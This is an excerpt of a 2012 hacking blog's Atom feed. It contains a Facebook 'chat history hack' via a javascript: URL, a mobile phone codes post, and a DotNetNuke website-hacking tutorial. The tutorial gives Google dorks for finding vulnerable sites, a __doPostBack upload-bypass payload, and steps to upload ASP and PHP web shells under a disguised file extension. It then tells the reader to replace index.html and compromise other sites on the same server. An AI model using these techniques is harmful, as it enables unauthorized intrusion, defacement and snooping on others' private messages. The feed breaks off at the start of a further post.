&lt;span style="color: #38761d;"&gt;&lt;b&gt;There is a simple easy Trick to Hack Facebook Chat History. We can Hack Chat History even if our Friends are Offline. To use this Trick follow the simple steps given below :&lt;br /&gt;1) Open Friends profile.&lt;br /&gt;&lt;br /&gt;2) Right Click on the Poke and Select Copy Link Location. Now we have the ID in our Clipboard.&lt;br /&gt;3) This will exactly look like :&lt;br /&gt;&amp;nbsp;http://www.facebook.com/profile.php?id=XYZ&lt;br /&gt;( where XYX can be any numbers and this XYZ is nothing but the ID ).&lt;br /&gt;4) Now in the Address Bar type "javascript:Chat.openTab(XYZ)" (without qoutes) and press Enter.&lt;br /&gt;5) Now it is done.&lt;br /&gt;6) You can see full Chat History now.&lt;br /&gt;So this is a simple Trick to Hack Facebook Chat History. &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;/span&gt;&lt;span style="color: magenta;"&gt;&lt;i&gt;&lt;a href="http://www.bdcyberarmy.tk/" target="_blank"&gt;Thank's for visiting !&lt;/a&gt;&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4059748650257666395?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4059748650257666395?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/12/hack-your-friends-facebook-chat-history.html' title='Hack your Friend&apos;s Facebook Chat History !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-tMapqSCZ--Y/UMxZaVHfe2I/AAAAAAAAARc/yD6R6VFHdlw/s72-c/facebook-chat-hack.png' height='72' width='72'/></entry><entry gd:etag='W/&quot;AkQFQHw5fip7ImA9WhNTFkk.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-5936612371853601717</id><published>2012-10-19T17:41:00.003+06:00</published><updated>2012-10-19T18:05:11.226+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-19T18:05:11.226+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='TeleCommunication'/><title>Mobile Phone Secret Codes !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Hello visitor ,Today today I'll tel some secret code of Many Mobile Phone Provider Like Nokia,Siemens,I-Phone,Samsung,China Mobile Phone ETC.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;html&gt;
 &lt;head&gt;
  
  &lt;title&gt;Mobile Phone Secret Codes&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 


&lt;script&gt;
&lt;!--


var winheight=100
var winsize=100
var x=5

/*
Animated Window Opener Script (updated 00/04/24)- 

*/



function openwindow(thelocation){
temploc=thelocation
if (!(window.resizeTo&amp;&amp;document.all)&amp;&amp;!(window.resizeTo&amp;&amp;document.getElementById)){
window.open(thelocation)
return
}
win2=window.open("","","scrollbars")
win2.moveTo(0,0)
win2.resizeTo(100,100)
go2()
}
function go2(){
if (winheight&gt;=screen.availHeight-3)
x=0
win2.resizeBy(5,x)
winheight+=5
winsize+=5
if (winsize&gt;=screen.width-5){
win2.location=temploc
winheight=100
winsize=100
x=5
return
}
setTimeout("go2()",50)
}
//&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;


&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-0OQdU-FIwp4/UIE8TNz9l9I/AAAAAAAAAQo/ppNprCpaD7s/s1600/mobilephonesecretcodes.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-0OQdU-FIwp4/UIE8TNz9l9I/AAAAAAAAAQo/ppNprCpaD7s/s400/mobilephonesecretcodes.jpg" width="396" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;&lt;a href="javascript:openwindow('http://citycell.my3gb.com/iphone.html')"&gt;I-Phone&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;&lt;a href="javascript:openwindow('http://citycell.my3gb.com/nokia.html')"&gt;Nokia&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;

&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;&lt;a href="javascript:openwindow('http://citycell.my3gb.com/sumsung.html')"&gt;Samsung&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;&lt;a href="javascript:openwindow('http://citycell.my3gb.com/chia-ph.html')"&gt;China Phone&lt;/a&gt;&lt;/b&gt;&lt;/span&gt; 
&lt;style type="text/css"&gt;
.btnLogin{

    -moz-border-radius:2px;

    -webkit-border-radius:2px;

    border-radius:15px;

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #badff3, #7acbed);

    background:-webkit-gradient(linear, center top, center bottom, from(#badff3), to(#7acbed));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#badff3', EndColorStr='#7acbed')";

    border:1px solid #7db0cc !important;

    cursor: pointer;

    padding:11px 16px;

    font:bold 11px/14px Verdana, Tahomma, Geneva;

    text-shadow:rgba(0,0,0,0.2) 0 1px 0px;

    color:#fff;

    -moz-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    -webkit-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    margin-center:12px;

    float:center;

    padding:7px 21px;

}


.btnLogin  : hover,

.btnLogin::focus,

.btnLogin : active{

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #7acbed, #badff3);

    background:-webkit-gradient(linear, center top, center bottom, from(#7acbed), to(#badff3));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#7acbed', EndColorStr='#badff3')";

}

.btnLogin:active{

    text-shadow:rgba(0,0,0,0.3) 0 -1px 0px;

}
&lt;/style&gt;
&lt;!-- Start of Message Alert --&gt;
&lt;!-- Use this button in a form to pop-up a message when the user clicks it --&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;"&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;A&amp;nbsp;Personal Unlock Code&amp;nbsp;(PUC), also known as a&amp;nbsp;&lt;i&gt;PIN Unlocked Key&lt;/i&gt;&amp;nbsp;(PUK), is used in&amp;nbsp;&lt;a href="http://en.wikipedia.org/wiki/3GPP" style="background-image: none; text-decoration: none;" title="3GPP"&gt;3GPP&lt;/a&gt;&amp;nbsp;&lt;a href="http://en.wikipedia.org/wiki/Mobile_phone" style="background-image: none; text-decoration: none;" title="Mobile phone"&gt;mobile phones&lt;/a&gt;&amp;nbsp;to reset a&amp;nbsp;&lt;a href="http://en.wikipedia.org/wiki/Personal_identification_number" style="background-image: none; text-decoration: none;" title="Personal identification number"&gt;personal identification number&lt;/a&gt;&amp;nbsp;(PIN) that has been lost or forgotten.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;"&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Most mobile telephones offer the feature of PIN (PIN) protection. After switching on the phone, if the PIN security function is active, the user is requested to enter a 4-8 digit PIN enabling the phone's non-emergency calling functions. If the wrong PIN is typed in more than three times, either the&amp;nbsp;&lt;a class="mw-redirect" href="http://en.wikipedia.org/wiki/SIM_card" style="background-image: none; text-decoration: none;" title="SIM card"&gt;SIM card&lt;/a&gt;, the device or both become locked. They can be reverted to their original unlocked state by entering a PUC, provided by the service operator through verification. If the wrong PUC is entered ten times in a row, the device will become permanently blocked and unrecoverable, requiring a new SIM card. Cellular phone users are therefore advised by most providers to keep their PUC written down in a safe place separate from the device.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;"&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;The PUC (PUK) is a SIM-specific code assigned by the service provider. It is near-impossible to guess and enter it; thus, if a user does not know his or her PUC and is prompted for it, it should be obtained from the service provider.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;"&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Once you enter the PUK code, you must set a pin. The PUK (Personal Unblocking Key) and PUK2 are used to unlock the PIN and PIN 2 codes respectively if your SIM card is blocked.&lt;sup class="reference" id="cite_ref-0" style="line-height: 1em;"&gt;&lt;a href="http://en.wikipedia.org/wiki/Personal_unblocking_code#cite_note-0" style="background-image: none; text-decoration: none; white-space: nowrap;"&gt;[1]&lt;/a&gt;&lt;/sup&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;form&gt;
&lt;input class="btnLogin" onclick="alert('Join with us And get More knowladge.This tutorial is Educational purpose only.'); return true" type="button" value="Thanka For Visiting" /&gt;
&lt;/form&gt;
&lt;/center&gt;
&lt;!-- End of Message Alert --&gt;
&lt;/div&gt;
&lt;a href="http://www.blogger.com/blogger.g?blogID=921095381650575288"&gt;&lt;/a&gt; &lt;/div&gt;
</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/5936612371853601717?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/5936612371853601717?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/mobile-phone-secret-codes.html' title='Mobile Phone Secret Codes !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-0OQdU-FIwp4/UIE8TNz9l9I/AAAAAAAAAQo/ppNprCpaD7s/s72-c/mobilephonesecretcodes.jpg' height='72' width='72'/></entry><entry gd:etag='W/&quot;DEQGQXc7eyp7ImA9WhNTFkk.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-4256141516510320733</id><published>2012-10-19T17:30:00.001+06:00</published><updated>2012-10-19T17:32:00.903+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-19T17:32:00.903+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Web Development'/><category scheme='http://www.blogger.com/atom/ns#' term='web Site Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title>Web site Hacking Dot Net Nuke (DNN)</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/--JP8BaTgH_Y/UIE50zm1PzI/AAAAAAAAAQc/nGqmLc890-g/s1600/Portal+Hacking+(DNN).jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="164" src="http://2.bp.blogspot.com/--JP8BaTgH_Y/UIE50zm1PzI/AAAAAAAAAQc/nGqmLc890-g/s320/Portal+Hacking+(DNN).jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Hello everyone!! Previously we have discussed about "How to Hack Website Using Havij SQL Injection". Today,I am going to tell about one more very usefull but old method which you can used to hack website using Dot net nuke(DNN) exploit. I know some of you know about this method DNN but it is very good exploit to hack dot net sites. By using this DNN exploit, you can even hack all sites which are hosted on same server. Also you can upload any file using it. It is easy method as compared to other hacking attacks such as SQL-Injection and Cross Site Scripting etc.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;What is DNN (Dot Net Nuke) ?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 1:&lt;/span&gt;&lt;/b&gt; &lt;span style="color: #38761d;"&gt;First go to google.com search page and use this following dork to find vulnerable site.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; inurl:home/tabid/36/language/en-US/Default.aspx&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Another dorks you can use&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; inurl:fcklinkgallery.aspx&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; inurl:/portals/0&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 2:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Now open any site from the search list like&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Now replace&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: magenta;"&gt;"home/tabid/36/language/en-US/Default.aspx" &amp;nbsp;&lt;/span&gt;&lt;/b&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: #38761d;"&gt; with &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;So your url will become&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Then hit enter&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 3:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Now there are 2 possibilities&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;If u get Link Gallery url select then site is not vulnerable , see the image below&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-EAsfkUdojd8/UIE3hQ8fNaI/AAAAAAAAAP8/ldJfKqu-GS0/s1600/img1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-EAsfkUdojd8/UIE3hQ8fNaI/AAAAAAAAAP8/ldJfKqu-GS0/s1600/img1.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;And If you get Like shown in below image then target is vulnerable&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-bZWemcTXqnY/UIE3wZPX8TI/AAAAAAAAAQE/zOGYyBvZkJ0/s1600/img2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="214" src="http://3.bp.blogspot.com/-bZWemcTXqnY/UIE3wZPX8TI/AAAAAAAAAQE/zOGYyBvZkJ0/s320/img2.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;ok now if you find a vulnerable site move to next step&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 4:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Now you can see 3 options there and we neeed to select “File in your site”.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-SRtKz4CyTuU/UIE38qH3gXI/AAAAAAAAAQM/OMe-BEYoWAw/s1600/img3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="229" src="http://4.bp.blogspot.com/-SRtKz4CyTuU/UIE38qH3gXI/AAAAAAAAAQM/OMe-BEYoWAw/s320/img3.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 5: &lt;/span&gt;&lt;span style="color: #38761d;"&gt;Now after selecting 3 options, we need to use a javascript code. For that we need to use that browser which supports javascript. So i use Opera Mini .&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Before using javascript, first we need to choose file location as root, after that clear everything written on browser url and paste the below javascript only.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; javascript:__doPostBack('ctlURL$cmdUpload','')&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 6:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;After inject the above javascript code in browser address bar, you will get upload option instead of selection option.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-ByhuqSFY-f8/UIE4SQG_W2I/AAAAAAAAAQU/b4HF04NOxak/s1600/img4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="232" src="http://2.bp.blogspot.com/-ByhuqSFY-f8/UIE4SQG_W2I/AAAAAAAAAQU/b4HF04NOxak/s320/img4.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 7:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Now you have to upload your shell.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Note :&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;But remember you cant upload your shell directly in .php format and not even you can do anything by uploading&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: magenta;"&gt;.php.jpg&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;So for this purpose first we need to upload a special type of shell which is specially coded in asp.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Download the shell :-&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;For more ASP shell goto&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: magenta;"&gt;&lt;a href="http://www.sh3ll.org/"&gt;www.sh3ll.org&lt;/a&gt;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Now rename your asp shell to&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; &amp;nbsp; yourshell.asp;.jpg&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;And upload it.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;After uploading you can access your ASP shell by going to this address,&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; http://www.vulsite.com/portals/0/yourshell.asp;.jpg&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 8:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Now upload your php shell using upload file option marked in above image.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;After uploading php shell you can access it by going to this address,&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;http://www.vulsite.com/portals/0/yourphpshell.php&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 9: &lt;/span&gt;&lt;span style="color: #38761d;"&gt;Now replace your index.html with original index.html. Thats it.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Well you can also hack all sites which are hosted on same server.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;For that follow the bellow image and click on Drives you will find all sites hosted on same server.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Click on any one site and follow the above process to upload you shell.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;style type="text/css"&gt;
.btnLogin{

    -moz-border-radius:2px;

    -webkit-border-radius:2px;

    border-radius:15px;

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #badff3, #7acbed);

    background:-webkit-gradient(linear, center top, center bottom, from(#badff3), to(#7acbed));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#badff3', EndColorStr='#7acbed')";

    border:1px solid #7db0cc !important;

    cursor: pointer;

    padding:11px 16px;

    font:bold 11px/14px Verdana, Tahomma, Geneva;

    text-shadow:rgba(0,0,0,0.2) 0 1px 0px;

    color:#fff;

    -moz-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    -webkit-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    margin-center:12px;

    float:center;

    padding:7px 21px;

}


.btnLogin  : hover,

.btnLogin::focus,

.btnLogin : active{

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #7acbed, #badff3);

    background:-webkit-gradient(linear, center top, center bottom, from(#7acbed), to(#badff3));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#7acbed', EndColorStr='#badff3')";

}

.btnLogin:active{

    text-shadow:rgba(0,0,0,0.3) 0 -1px 0px;

}
&lt;/style&gt;
&lt;!-- Start of Message Alert --&gt;
&lt;!-- Use this button in a form to pop-up a message when the user clicks it --&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;form&gt;
&lt;input class="btnLogin" onclick="alert('Remember Hacking Is Crime.This tutorial is Educational purpose only'); return true" type="button" value="Remember" /&gt;
&lt;/form&gt;
&lt;/center&gt;
&lt;!-- End of Message Alert --&gt;&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/4256141516510320733/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=4256141516510320733&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4256141516510320733?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4256141516510320733?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/eb-site-hacking-dot-net-nuke-dnn.html' title='Web site Hacking Dot Net Nuke (DNN)'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/--JP8BaTgH_Y/UIE50zm1PzI/AAAAAAAAAQc/nGqmLc890-g/s72-c/Portal+Hacking+(DNN).jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;D0YMQXg6eyp7ImA9WhNTFkk.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-5957241577132076163</id><published>2012-10-19T17:11:00.002+06:00</published><updated>2012-10-19T17:13:00.613+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-19T17:13:00.613+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='web Site Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Web Devolopment'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title>Basic Ethical  Hacking part 1</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
